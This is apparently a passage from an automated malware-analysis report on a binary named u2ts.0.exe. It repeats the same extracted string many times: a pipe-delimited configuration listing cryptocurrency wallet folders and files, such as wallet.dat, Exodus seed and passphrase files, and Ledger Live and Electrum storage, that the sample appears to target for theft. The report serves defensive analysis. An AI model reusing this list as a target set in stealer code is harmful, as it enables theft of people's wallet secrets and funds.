Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo 